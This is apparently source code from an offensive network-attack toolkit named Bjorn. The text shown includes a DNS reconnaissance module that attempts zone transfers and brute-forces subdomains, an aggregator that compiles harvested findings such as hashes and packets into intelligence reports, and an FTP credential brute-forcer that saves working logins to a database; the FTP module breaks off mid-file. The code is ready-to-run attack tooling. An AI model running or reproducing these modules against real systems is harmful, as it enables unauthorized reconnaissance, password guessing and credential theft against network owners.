"ns3", "ns4", "dns", "dns1", "dns2", "mx", "mx1", "mx2", "imap", "pop3",
"blog", "dev", "staging", "test", "testing", "beta", "alpha", "demo",
"admin", "administrator", "panel", "cpanel", "webmin", "portal",
"api", "api2", "api3", "gateway", "gw", "proxy", "cdn", "media",
"static", "assets", "img", "images", "files", "download", "upload",
"vpn", "remote", "ssh", "rdp", "citrix", "owa", "exchange",
"db", "database", "mysql", "postgres", "sql", "mongodb", "redis", "elastic",
"shop", "store", "app", "apps", "mobile", "m",
"intranet", "extranet", "internal", "external", "private", "public",
"cloud", "aws", "azure", "gcp", "s3", "storage",
"git", "gitlab", "github", "svn", "repo", "ci", "cd", "jenkins", "build",
"monitor", "monitoring", "grafana", "prometheus", "kibana", "nagios", "zabbix",
"log", "logs", "syslog", "elk",
"chat", "slack", "teams", "jira", "confluence", "wiki",
"backup", "backups", "bak", "archive",
"secure", "security", "sso", "auth", "login", "oauth",
"docs", "doc", "help", "support", "kb", "status",
"calendar", "crm", "erp", "hr",
"web", "web1", "web2", "server", "server1", "server2",
"host", "node", "worker", "master",
]
# DNS record types to enumerate
DNS_RECORD_TYPES = ["A", "AAAA", "MX", "NS", "TXT", "CNAME", "SOA", "SRV", "PTR"]
class DNSPillager:
"""
DNS reconnaissance action for the Bjorn orchestrator.
Performs reverse DNS, record enumeration, zone transfer attempts,
and subdomain brute-force discovery.
"""
def __init__(self, shared_data: SharedData):
self.shared_data = shared_data
# IP -> (MAC, hostname) identity cache from DB
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
# DNS resolver setup (dnspython)
self._resolver = None
if _HAS_DNSPYTHON:
self._resolver = dns.resolver.Resolver()
self._resolver.timeout = 3
self._resolver.lifetime = 5
# Ensure output directory exists
try:
os.makedirs(OUTPUT_DIR, exist_ok=True)
except Exception as e:
logger.error(f"Failed to create output directory {OUTPUT_DIR}: {e}")
# Thread safety
self._lock = threading.Lock()
logger.info("DNSPillager initialized (dnspython=%s)", _HAS_DNSPYTHON)
# --------------------- Identity cache (hosts) ---------------------
def _refresh_ip_identity_cache(self) -> None:
"""Rebuild IP -> (MAC, current_hostname) from DB.hosts."""
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip_addr in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip_addr] = (mac, current_hn)
def _mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def _hostname_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# --------------------- Public API (Orchestrator) ---------------------
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
"""
Execute DNS reconnaissance on the given target.
Args:
ip: Target IP address
port: Target port (typically 53)
row: Row dict from orchestrator (contains MAC, hostname, etc.)
status_key: Status tracking key
Returns:
'success' | 'failed' | 'interrupted'
"""
self.shared_data.bjorn_orch_status = "DNSPillager"
self.shared_data.bjorn_progress = "0%"
self.shared_data.comment_params = {"ip": ip, "port": str(port), "phase": "init"}
results = {
"target_ip": ip,
"port": str(port),
"timestamp": datetime.datetime.now().isoformat(),
"reverse_dns": None,
"domain": None,
"records": {},
"zone_transfer": {},
"subdomains": [],
"errors": [],
}
try:
# --- Check for early exit ---
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal before start.")
return "interrupted"
mac = row.get("MAC Address") or row.get("mac_address") or self._mac_for_ip(ip) or ""
hostname = (
row.get("Hostname") or row.get("hostname")
or self._hostname_for_ip(ip)
or ""
)
# =========================================================
# Phase 1: Reverse DNS lookup (0% -> 10%)
# =========================================================
self.shared_data.comment_params = {"ip": ip, "phase": "reverse_dns"}
logger.info(f"[{ip}] Phase 1: Reverse DNS lookup")
reverse_hostname = self._reverse_dns(ip)
if reverse_hostname:
results["reverse_dns"] = reverse_hostname
logger.info(f"[{ip}] Reverse DNS: {reverse_hostname}")
self.shared_data.log_milestone(b_class, "ReverseDNS", f"IP: {ip} -> {reverse_hostname}")
# Update hostname if we found something new
if not hostname or hostname == ip:
hostname = reverse_hostname
else:
logger.info(f"[{ip}] No reverse DNS result.")
self.shared_data.bjorn_progress = "10%"
if self.shared_data.orchestrator_should_exit:
return "interrupted"
# =========================================================
# Phase 2: Extract domain and enumerate DNS records (10% -> 35%)
# =========================================================
domain = self._extract_domain(hostname)
results["domain"] = domain
if domain:
self.shared_data.comment_params = {"ip": ip, "phase": "records", "domain": domain}
logger.info(f"[{ip}] Phase 2: DNS record enumeration for {domain}")
self.shared_data.log_milestone(b_class, "EnumerateRecords", f"Domain: {domain}")
record_results = {}
total_types = len(DNS_RECORD_TYPES)
for idx, rtype in enumerate(DNS_RECORD_TYPES):
if self.shared_data.orchestrator_should_exit:
return "interrupted"
records = self._query_records(domain, rtype)
if records:
record_results[rtype] = records
logger.info(f"[{ip}] {rtype} records for {domain}: {records}")
# Progress: 10% -> 35% across record types
pct = 10 + int((idx + 1) / total_types * 25)
self.shared_data.bjorn_progress = f"{pct}%"
results["records"] = record_results
else:
logger.warning(f"[{ip}] No domain could be extracted. Skipping record enumeration.")
self.shared_data.bjorn_progress = "35%"
if self.shared_data.orchestrator_should_exit:
return "interrupted"
# =========================================================
# Phase 3: Zone transfer (AXFR) attempt (35% -> 45%)
# =========================================================
self.shared_data.bjorn_progress = "35%"
self.shared_data.comment_params = {"ip": ip, "phase": "zone_transfer", "domain": domain or ip}
if domain and _HAS_DNSPYTHON:
logger.info(f"[{ip}] Phase 3: Zone transfer attempt for {domain}")
nameservers = results["records"].get("NS", [])
# Also try the target IP itself as a nameserver
ns_targets = list(set(nameservers + [ip]))
zone_results = {}
for ns_idx, ns in enumerate(ns_targets):
if self.shared_data.orchestrator_should_exit:
return "interrupted"
axfr_records = self._attempt_zone_transfer(domain, ns)
if axfr_records:
zone_results[ns] = axfr_records
logger.success(f"[{ip}] Zone transfer SUCCESS from {ns}: {len(axfr_records)} records")
self.shared_data.log_milestone(b_class, "AXFRSuccess", f"NS: {ns} | Records: {len(axfr_records)}")
# Progress within 35% -> 45%
if ns_targets:
pct = 35 + int((ns_idx + 1) / len(ns_targets) * 10)
self.shared_data.bjorn_progress = f"{pct}%"
results["zone_transfer"] = zone_results
else:
if not _HAS_DNSPYTHON:
results["errors"].append("Zone transfer skipped: dnspython not available")
elif not domain:
results["errors"].append("Zone transfer skipped: no domain found")
logger.info(f"[{ip}] Skipping zone transfer (dnspython={_HAS_DNSPYTHON}, domain={domain})")
self.shared_data.bjorn_progress = "45%"
if self.shared_data.orchestrator_should_exit:
return "interrupted"
# =========================================================
# Phase 4: Subdomain brute-force (45% -> 95%)
# =========================================================
self.shared_data.comment_params = {"ip": ip, "phase": "subdomains", "domain": domain or ip}
if domain:
logger.info(f"[{ip}] Phase 4: Subdomain brute-force for {domain}")
self.shared_data.log_milestone(b_class, "SubdomainEnum", f"Domain: {domain}")
wordlist = self._load_wordlist()
thread_count = min(10, max(1, len(wordlist)))
discovered = self._enumerate_subdomains(domain, wordlist, thread_count)
results["subdomains"] = discovered
logger.info(f"[{ip}] Subdomain enumeration found {len(discovered)} live subdomains")
else:
logger.info(f"[{ip}] Skipping subdomain enumeration: no domain available")
results["errors"].append("Subdomain enumeration skipped: no domain found")
self.shared_data.bjorn_progress = "95%"
if self.shared_data.orchestrator_should_exit:
return "interrupted"
# =========================================================
# Phase 5: Save results and update DB (95% -> 100%)
# =========================================================
self.shared_data.comment_params = {"ip": ip, "phase": "saving"}
logger.info(f"[{ip}] Phase 5: Saving results")
# Save JSON output
self._save_results(ip, results)
# Update DB hostname if reverse DNS discovered new data
if reverse_hostname and mac:
self._update_db_hostname(mac, ip, reverse_hostname)
self.shared_data.bjorn_progress = "100%"
self.shared_data.log_milestone(b_class, "Complete", f"Records: {sum(len(v) for v in results['records'].values())} | Subdomains: {len(results['subdomains'])}")
# Summary comment
record_count = sum(len(v) for v in results["records"].values())
zone_count = sum(len(v) for v in results["zone_transfer"].values())
sub_count = len(results["subdomains"])
self.shared_data.comment_params = {
"ip": ip,
"domain": domain or "N/A",
"records": str(record_count),
"zones": str(zone_count),
"subdomains": str(sub_count),
}
logger.success(
f"[{ip}] DNS Pillager complete: domain={domain}, "
f"records={record_count}, zone_transfers={zone_count}, subdomains={sub_count}"
)
return "success"
except Exception as e:
logger.error(f"[{ip}] DNSPillager execute failed: {e}")
results["errors"].append(str(e))
# Still try to save partial results
try:
self._save_results(ip, results)
except Exception:
pass
return "failed"
finally:
self.shared_data.bjorn_progress = ""
# --------------------- Reverse DNS ---------------------
def _reverse_dns(self, ip: str) -> Optional[str]:
"""Perform reverse DNS lookup on the IP address."""
# Try dnspython first
if _HAS_DNSPYTHON and self._resolver:
try:
rev_name = dns.reversename.from_address(ip)
answers = self._resolver.resolve(rev_name, "PTR")
for rdata in answers:
hostname = str(rdata).rstrip(".")
if hostname:
return hostname
except Exception as e:
logger.debug(f"dnspython reverse DNS failed for {ip}: {e}")
# Socket fallback
try:
hostname, _, _ = socket.gethostbyaddr(ip)
if hostname and hostname != ip:
return hostname
except (socket.herror, socket.gaierror, OSError) as e:
logger.debug(f"Socket reverse DNS failed for {ip}: {e}")
return None
# --------------------- Domain extraction ---------------------
@staticmethod
def _extract_domain(hostname: str) -> Optional[str]:
"""
Extract the registerable domain from a hostname.
e.g., 'mail.sub.example.com' -> 'example.com'
'host1.internal.lan' -> 'internal.lan'
'192.168.1.1' -> None
"""
if not hostname:
return None
# Skip raw IPs
hostname = hostname.strip().rstrip(".")
parts = hostname.split(".")
if len(parts) < 2:
return None
# Check if it looks like an IP address
try:
socket.inet_aton(hostname)
return None # It's an IP, not a hostname
except (socket.error, OSError):
pass
# For simple TLDs, take the last 2 parts
# For compound TLDs (co.uk, com.au), take the last 3 parts
compound_tlds = {
"co.uk", "co.jp", "co.kr", "co.nz", "co.za", "co.in",
"com.au", "com.br", "com.cn", "com.mx", "com.tw",
"org.uk", "net.au", "ac.uk", "gov.uk",
}
if len(parts) >= 3:
possible_compound = f"{parts[-2]}.{parts[-1]}"
if possible_compound.lower() in compound_tlds:
return ".".join(parts[-3:])
return ".".join(parts[-2:])
# --------------------- DNS record queries ---------------------
def _query_records(self, domain: str, record_type: str) -> List[str]:
"""Query DNS records of a given type for a domain."""
records = []
# Try dnspython first
if _HAS_DNSPYTHON and self._resolver:
try:
answers = self._resolver.resolve(domain, record_type)
for rdata in answers:
value = str(rdata).rstrip(".")
if value:
records.append(value)
return records
except dns.resolver.NXDOMAIN:
logger.debug(f"NXDOMAIN for {domain} {record_type}")
except dns.resolver.NoAnswer:
logger.debug(f"No answer for {domain} {record_type}")
except dns.resolver.NoNameservers:
logger.debug(f"No nameservers for {domain} {record_type}")
except dns.exception.Timeout:
logger.debug(f"Timeout querying {domain} {record_type}")
except Exception as e:
logger.debug(f"dnspython query failed for {domain} {record_type}: {e}")
# Socket fallback (limited to A records only)
if record_type == "A" and not records:
try:
ips = socket.getaddrinfo(domain, None, socket.AF_INET, socket.SOCK_STREAM)
for info in ips:
addr = info[4][0]
if addr and addr not in records:
records.append(addr)
except (socket.gaierror, OSError) as e:
logger.debug(f"Socket fallback failed for {domain} A: {e}")
# Socket fallback for AAAA
if record_type == "AAAA" and not records:
try:
ips = socket.getaddrinfo(domain, None, socket.AF_INET6, socket.SOCK_STREAM)
for info in ips:
addr = info[4][0]
if addr and addr not in records:
records.append(addr)
except (socket.gaierror, OSError) as e:
logger.debug(f"Socket fallback failed for {domain} AAAA: {e}")
return records
# --------------------- Zone transfer (AXFR) ---------------------
def _attempt_zone_transfer(self, domain: str, nameserver: str) -> List[Dict]:
"""
Attempt an AXFR zone transfer from a nameserver.
Returns a list of record dicts on success, empty list on failure.
"""
if not _HAS_DNSPYTHON:
return []
records = []
# Resolve NS hostname to IP if needed
ns_ip = self._resolve_ns_to_ip(nameserver)
if not ns_ip:
logger.debug(f"Cannot resolve NS {nameserver} to IP, skipping AXFR")
return []
try:
zone = dns.zone.from_xfr(
dns.query.xfr(ns_ip, domain, timeout=10, lifetime=30)
)
for name, node in zone.nodes.items():
for rdataset in node.rdatasets:
for rdata in rdataset:
records.append({
"name": str(name),
"type": dns.rdatatype.to_text(rdataset.rdtype),
"ttl": rdataset.ttl,
"value": str(rdata),
})
except dns.exception.FormError:
logger.debug(f"AXFR refused by {nameserver} ({ns_ip}) for {domain}")
except dns.exception.Timeout:
logger.debug(f"AXFR timeout from {nameserver} ({ns_ip}) for {domain}")
except ConnectionError as e:
logger.debug(f"AXFR connection error from {nameserver}: {e}")
except OSError as e:
logger.debug(f"AXFR OS error from {nameserver}: {e}")
except Exception as e:
logger.debug(f"AXFR failed from {nameserver} ({ns_ip}) for {domain}: {e}")
return records
def _resolve_ns_to_ip(self, nameserver: str) -> Optional[str]:
"""Resolve a nameserver hostname to an IP address."""
ns = nameserver.strip().rstrip(".")
# Check if already an IP
try:
socket.inet_aton(ns)
return ns
except (socket.error, OSError):
pass
# Try to resolve
if _HAS_DNSPYTHON and self._resolver:
try:
answers = self._resolver.resolve(ns, "A")
for rdata in answers:
return str(rdata)
except Exception:
pass
# Socket fallback
try:
result = socket.getaddrinfo(ns, 53, socket.AF_INET, socket.SOCK_STREAM)
if result:
return result[0][4][0]
except Exception:
pass
return None
# --------------------- Subdomain enumeration ---------------------
def _load_wordlist(self) -> List[str]:
"""Load subdomain wordlist from file or use built-in list."""
# Check for configured wordlist path
wordlist_path = ""
if hasattr(self.shared_data, "config") and self.shared_data.config:
wordlist_path = self.shared_data.config.get("dns_wordlist", "")
if wordlist_path and os.path.isfile(wordlist_path):
try:
with open(wordlist_path, "r", encoding="utf-8", errors="ignore") as f:
words = [line.strip() for line in f if line.strip() and not line.startswith("#")]
if words:
logger.info(f"Loaded {len(words)} subdomains from {wordlist_path}")
return words
except Exception as e:
logger.error(f"Failed to load wordlist {wordlist_path}: {e}")
logger.info(f"Using built-in subdomain wordlist ({len(BUILTIN_SUBDOMAINS)} entries)")
return list(BUILTIN_SUBDOMAINS)
def _enumerate_subdomains(
self, domain: str, wordlist: List[str], thread_count: int
) -> List[Dict]:
"""
Brute-force subdomain enumeration using ThreadPoolExecutor.
Returns a list of discovered subdomain dicts.
"""
discovered: List[Dict] = []
total = len(wordlist)
if total == 0:
return discovered
completed = [0] # mutable counter for thread-safe progress
def check_subdomain(sub: str) -> Optional[Dict]:
"""Check if a subdomain resolves."""
if self.shared_data.orchestrator_should_exit:
return None
fqdn = f"{sub}.{domain}"
result = None
# Try dnspython
if _HAS_DNSPYTHON and self._resolver:
try:
answers = self._resolver.resolve(fqdn, "A")
ips = [str(rdata) for rdata in answers]
if ips:
result = {
"subdomain": sub,
"fqdn": fqdn,
"ips": ips,
"method": "dns",
}
except Exception:
pass
# Socket fallback
if result is None:
try:
addr_info = socket.getaddrinfo(fqdn, None, socket.AF_INET, socket.SOCK_STREAM)
ips = list(set(info[4][0] for info in addr_info))
if ips:
result = {
"subdomain": sub,
"fqdn": fqdn,
"ips": ips,
"method": "socket",
}
except (socket.gaierror, OSError):
pass
# Update progress atomically
with self._lock:
completed[0] += 1
# Progress: 45% -> 95% across subdomain enumeration
pct = 45 + int((completed[0] / total) * 50)
pct = min(pct, 95)
self.shared_data.bjorn_progress = f"{pct}%"
return result
try:
with ThreadPoolExecutor(max_workers=thread_count) as executor:
futures = {
executor.submit(check_subdomain, sub): sub for sub in wordlist
}
for future in as_completed(futures):
if self.shared_data.orchestrator_should_exit:
# Cancel remaining futures
for f in futures:
f.cancel()
logger.info("Subdomain enumeration interrupted by orchestrator.")
break
try:
result = future.result(timeout=15)
if result:
with self._lock:
discovered.append(result)
logger.info(
f"Subdomain found: {result['fqdn']} -> {result['ips']}"
)
self.shared_data.comment_params = {
"ip": domain,
"phase": "subdomains",
"found": str(len(discovered)),
"last": result["fqdn"],
}
except Exception as e:
logger.debug(f"Subdomain future error: {e}")
except Exception as e:
logger.error(f"Subdomain enumeration thread pool error: {e}")
return discovered
# --------------------- Result saving ---------------------
def _save_results(self, ip: str, results: Dict) -> None:
"""Save DNS reconnaissance results to a JSON file."""
try:
os.makedirs(OUTPUT_DIR, exist_ok=True)
safe_ip = ip.replace(":", "_").replace(".", "_")
timestamp = datetime.datetime.now().strftime("%Y%m%d_%H%M%S")
filename = f"dns_{safe_ip}_{timestamp}.json"
filepath = os.path.join(OUTPUT_DIR, filename)
with open(filepath, "w", encoding="utf-8") as f:
json.dump(results, f, indent=2, default=str)
logger.info(f"Results saved to {filepath}")
except Exception as e:
logger.error(f"Failed to save results for {ip}: {e}")
# --------------------- DB hostname update ---------------------
def _update_db_hostname(self, mac: str, ip: str, new_hostname: str) -> None:
"""Update the hostname in the hosts DB table if we found new DNS data."""
if not mac or not new_hostname:
return
try:
rows = self.shared_data.db.query(
"SELECT hostnames FROM hosts WHERE mac_address=? LIMIT 1", (mac,)
)
if not rows:
return
existing = rows[0].get("hostnames") or ""
existing_set = set(h.strip() for h in existing.split(";") if h.strip())
if new_hostname not in existing_set:
existing_set.add(new_hostname)
updated = ";".join(sorted(existing_set))
self.shared_data.db.execute(
"UPDATE hosts SET hostnames=? WHERE mac_address=?",
(updated, mac),
)
logger.info(f"Updated DB hostname for MAC {mac}: added {new_hostname}")
# Refresh our local cache
self._refresh_ip_identity_cache()
except Exception as e:
logger.error(f"Failed to update DB hostname for MAC {mac}: {e}")
# ---------------------------------------------------------------------------
# CLI mode (debug / manual execution)
# ---------------------------------------------------------------------------
if __name__ == "__main__":
shared_data = SharedData()
try:
pillager = DNSPillager(shared_data)
logger.info("DNS Pillager module ready (CLI mode).")
rows = shared_data.read_data()
for row in rows:
ip = row.get("IPs") or row.get("ip")
if not ip:
continue
port = row.get("port") or 53
logger.info(f"Execute DNSPillager on {ip}:{port} ...")
status = pillager.execute(ip, str(port), row, "dns_pillager")
if status == "success":
logger.success(f"DNS recon successful for {ip}:{port}.")
elif status == "interrupted":
logger.warning(f"DNS recon interrupted for {ip}:{port}.")
break
else:
logger.failed(f"DNS recon failed for {ip}:{port}.")
logger.info("DNS Pillager CLI execution completed.")
except Exception as e:
logger.error(f"Error: {e}")
raise SystemExit(1)

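The registerable-domain heuristic in `DNSPillager._extract_domain` (last two labels, or last three when the trailing pair is a known compound TLD) can be exercised in isolation. This is a minimal sketch with a hand-picked compound-TLD subset, smaller than the action's real set:

```python
import socket

# Hand-picked subset for illustration; the action's set is larger.
COMPOUND_TLDS = {"co.uk", "com.au", "org.uk", "gov.uk"}

def extract_domain(hostname: str):
    """Return the registerable domain for a hostname, or None for IPs/bare names."""
    if not hostname:
        return None
    hostname = hostname.strip().rstrip(".")
    parts = hostname.split(".")
    if len(parts) < 2:
        return None
    try:
        socket.inet_aton(hostname)  # parses -> it's a raw IPv4, not a hostname
        return None
    except OSError:
        pass
    if len(parts) >= 3 and f"{parts[-2]}.{parts[-1]}".lower() in COMPOUND_TLDS:
        return ".".join(parts[-3:])  # compound TLD: keep three labels
    return ".".join(parts[-2:])      # simple TLD: keep two labels

print(extract_domain("mail.sub.example.com"))  # example.com
print(extract_domain("www.bbc.co.uk"))         # bbc.co.uk
print(extract_domain("192.168.1.1"))           # None
```

Note the deliberate trade-off: a static compound-TLD table is cheap and offline-friendly, whereas exhaustive correctness would require the Public Suffix List.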
actions/freya_harvest.py Normal file

@@ -0,0 +1,165 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
freya_harvest.py -- Data collection and intelligence aggregation for BJORN.
Monitors output directories and generates consolidated reports.
"""
import os
import json
import glob
import threading
import time
from datetime import datetime
from collections import defaultdict
from typing import Any, Dict, List, Optional
from logger import Logger
logger = Logger(name="freya_harvest.py")
# -------------------- Action metadata --------------------
b_class = "FreyaHarvest"
b_module = "freya_harvest"
b_status = "freya_harvest"
b_port = None
b_service = "[]"
b_trigger = "on_start"
b_parent = None
b_action = "normal"
b_priority = 50
b_cooldown = 0
b_rate_limit = None
b_timeout = 1800
b_max_retries = 1
b_stealth_level = 10 # Local file processing is stealthy
b_risk_level = "low"
b_enabled = 1
b_tags = ["harvest", "report", "aggregator", "intel"]
b_category = "recon"
b_name = "Freya Harvest"
b_description = "Aggregates findings from all modules into consolidated intelligence reports."
b_author = "Bjorn Team"
b_version = "2.0.4"
b_icon = "FreyaHarvest.png"
b_args = {
"input_dir": {
"type": "text",
"label": "Input Data Dir",
"default": "/home/bjorn/Bjorn/data/output"
},
"output_dir": {
"type": "text",
"label": "Reports Dir",
"default": "/home/bjorn/Bjorn/data/reports"
},
"watch": {
"type": "checkbox",
"label": "Continuous Watch",
"default": True
},
"format": {
"type": "select",
"label": "Report Format",
"choices": ["json", "md", "all"],
"default": "all"
}
}
class FreyaHarvest:
def __init__(self, shared_data):
self.shared_data = shared_data
self.data = defaultdict(list)
self.lock = threading.Lock()
self.last_scan_time = 0
def _collect_data(self, input_dir):
"""Scan directories for JSON findings."""
categories = ['wifi', 'topology', 'webscan', 'packets', 'hashes']
new_findings = 0
for cat in categories:
cat_path = os.path.join(input_dir, cat)
if not os.path.exists(cat_path): continue
for f_path in glob.glob(os.path.join(cat_path, "*.json")):
if os.path.getmtime(f_path) > self.last_scan_time:
try:
with open(f_path, 'r', encoding='utf-8') as f:
finds = json.load(f)
with self.lock:
self.data[cat].append(finds)
new_findings += 1
except (OSError, json.JSONDecodeError): pass
if new_findings > 0:
logger.info(f"FreyaHarvest: Collected {new_findings} new intelligence items.")
self.shared_data.log_milestone(b_class, "DataHarvested", f"Found {new_findings} new items")
self.last_scan_time = time.time()
def _generate_report(self, output_dir, fmt):
"""Generate consolidated findings report."""
if not any(self.data.values()):
return
ts = datetime.now().strftime("%Y%m%d_%H%M%S")
os.makedirs(output_dir, exist_ok=True)
if fmt in ['json', 'all']:
out_file = os.path.join(output_dir, f"intel_report_{ts}.json")
with open(out_file, 'w') as f:
json.dump(dict(self.data), f, indent=4)
self.shared_data.log_milestone(b_class, "ReportGenerated", f"JSON: {os.path.basename(out_file)}")
if fmt in ['md', 'all']:
out_file = os.path.join(output_dir, f"intel_report_{ts}.md")
with open(out_file, 'w') as f:
f.write(f"# Bjorn Intelligence Report - {ts}\n\n")
for cat, items in self.data.items():
f.write(f"## {cat.capitalize()}\n- Items: {len(items)}\n\n")
self.shared_data.log_milestone(b_class, "ReportGenerated", f"MD: {os.path.basename(out_file)}")
def execute(self, ip, port, row, status_key) -> str:
input_dir = getattr(self.shared_data, "freya_harvest_input", b_args["input_dir"]["default"])
output_dir = getattr(self.shared_data, "freya_harvest_output", b_args["output_dir"]["default"])
watch = getattr(self.shared_data, "freya_harvest_watch", True)
fmt = getattr(self.shared_data, "freya_harvest_format", "all")
timeout = int(getattr(self.shared_data, "freya_harvest_timeout", 600))
logger.info(f"FreyaHarvest: Starting data harvest from {input_dir}")
self.shared_data.log_milestone(b_class, "Startup", "Monitoring intelligence directories")
start_time = time.time()
try:
while time.time() - start_time < timeout:
if self.shared_data.orchestrator_should_exit:
break
self._collect_data(input_dir)
self._generate_report(output_dir, fmt)
# Progress
elapsed = int(time.time() - start_time)
prog = int((elapsed / timeout) * 100)
self.shared_data.bjorn_progress = f"{prog}%"
if not watch:
break
time.sleep(30) # Scan every 30s
self.shared_data.log_milestone(b_class, "Complete", "Harvesting session finished.")
except Exception as e:
logger.error(f"FreyaHarvest error: {e}")
return "failed"
return "success"
if __name__ == "__main__":
from init_shared import shared_data
harvester = FreyaHarvest(shared_data)
harvester.execute("0.0.0.0", None, {}, "freya_harvest")

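FreyaHarvest's incremental collection hinges on one comparison: a file is "new" when its mtime is later than the previous scan timestamp. A self-contained sketch of that core loop (flat directory instead of the action's per-category layout, demoed in a throwaway temp dir):

```python
import json
import os
import tempfile
import time

def collect_new(input_dir: str, last_scan: float):
    """Return parsed JSON payloads from files modified after last_scan."""
    found = []
    for name in sorted(os.listdir(input_dir)):
        if not name.endswith(".json"):
            continue
        path = os.path.join(input_dir, name)
        if os.path.getmtime(path) > last_scan:
            try:
                with open(path, "r", encoding="utf-8") as f:
                    found.append(json.load(f))
            except (OSError, json.JSONDecodeError):
                pass  # skip unreadable/corrupt files, as the action does
    return found

# Demo: one finding, scanned first from epoch 0, then from the future.
tmp = tempfile.mkdtemp()
with open(os.path.join(tmp, "a.json"), "w", encoding="utf-8") as f:
    json.dump({"cat": "wifi"}, f)
print(len(collect_new(tmp, 0)))                 # 1
print(len(collect_new(tmp, time.time() + 60)))  # 0
```

Advancing `last_scan` only after a full pass (as `_collect_data` does with `self.last_scan_time = time.time()`) means a file written mid-scan is picked up on the next iteration rather than lost.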
actions/ftp_bruteforce.py Normal file

@@ -0,0 +1,282 @@
"""
ftp_bruteforce.py — FTP bruteforce (DB-backed, no CSV/JSON, no rich)
- Targets: (ip, port) supplied by the orchestrator
- IP -> (MAC, hostname) resolved via DB.hosts
- Successes -> DB.creds (service='ftp')
- Preserves the original logic (queue/threads, optional sleeps, etc.)
"""
import os
import threading
import logging
import time
from ftplib import FTP
from queue import Queue
from typing import List, Dict, Tuple, Optional
from shared import SharedData
from actions.bruteforce_common import ProgressTracker, merged_password_plan
from logger import Logger
logger = Logger(name="ftp_bruteforce.py", level=logging.DEBUG)
b_class = "FTPBruteforce"
b_module = "ftp_bruteforce"
b_status = "brute_force_ftp"
b_port = 21
b_parent = None
b_service = '["ftp"]'
b_trigger = 'on_any:["on_service:ftp","on_new_port:21"]'
b_priority = 70
b_cooldown = 1800 # 30 minutes between runs
b_rate_limit = '3/86400' # max 3 runs per day
class FTPBruteforce:
"""Wrapper orchestrateur -> FTPConnector."""
def __init__(self, shared_data):
self.shared_data = shared_data
self.ftp_bruteforce = FTPConnector(shared_data)
logger.info("FTPConnector initialized.")
def bruteforce_ftp(self, ip, port):
"""Lance le bruteforce FTP pour (ip, port)."""
return self.ftp_bruteforce.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""Point d'entrée orchestrateur (retour 'success' / 'failed')."""
self.shared_data.bjorn_orch_status = "FTPBruteforce"
self.shared_data.comment_params = {"user": "?", "ip": ip, "port": str(port)}
logger.info(f"Brute forcing FTP on {ip}:{port}...")
success, results = self.bruteforce_ftp(ip, port)
return 'success' if success else 'failed'
class FTPConnector:
"""Gère les tentatives FTP, persistance DB, mapping IPâ†(MAC, Hostname)."""
def __init__(self, shared_data):
self.shared_data = shared_data
# Wordlists unchanged
self.users = self._read_lines(shared_data.users_file)
self.passwords = self._read_lines(shared_data.passwords_file)
# Cache IP -> (mac, hostname)
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
self.lock = threading.Lock()
self.results: List[List[str]] = [] # [mac, ip, hostname, user, password, port]
self.queue = Queue()
self.progress = None
# ---------- file utilities ----------
@staticmethod
def _read_lines(path: str) -> List[str]:
try:
with open(path, "r", encoding="utf-8", errors="ignore") as f:
return [l.rstrip("\n\r") for l in f if l.strip()]
except Exception as e:
logger.error(f"Cannot read file {path}: {e}")
return []
# ---------- mapping DB hosts ----------
def _refresh_ip_identity_cache(self) -> None:
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# ---------- FTP ----------
def ftp_connect(self, adresse_ip: str, user: str, password: str, port: int = 21) -> bool:
timeout = float(getattr(self.shared_data, "ftp_connect_timeout_s", 3.0))
try:
conn = FTP()
conn.connect(adresse_ip, port, timeout=timeout)
conn.login(user, password)
try:
conn.quit()
except Exception:
pass
logger.info(f"Access to FTP successful on {adresse_ip} with user '{user}'")
return True
except Exception:
return False
# ---------- DB upsert fallback ----------
def _fallback_upsert_cred(self, *, mac, ip, hostname, user, password, port, database=None):
mac_k = mac or ""
ip_k = ip or ""
user_k = user or ""
db_k = database or ""
port_k = int(port or 0)
try:
with self.shared_data.db.transaction(immediate=True):
self.shared_data.db.execute(
"""
INSERT OR IGNORE INTO creds(service,mac_address,ip,hostname,"user","password",port,"database",extra)
VALUES('ftp',?,?,?,?,?,?,?,NULL)
""",
(mac_k, ip_k, hostname or "", user_k, password or "", port_k, db_k),
)
self.shared_data.db.execute(
"""
UPDATE creds
SET "password"=?,
hostname=COALESCE(?, hostname),
last_seen=CURRENT_TIMESTAMP
WHERE service='ftp'
AND COALESCE(mac_address,'')=?
AND COALESCE(ip,'')=?
AND COALESCE("user",'')=?
AND COALESCE(COALESCE("database",""),'')=?
AND COALESCE(port,0)=?
""",
(password or "", hostname or None, mac_k, ip_k, user_k, db_k, port_k),
)
except Exception as e:
logger.error(f"fallback upsert_cred failed for {ip} {user}: {e}")
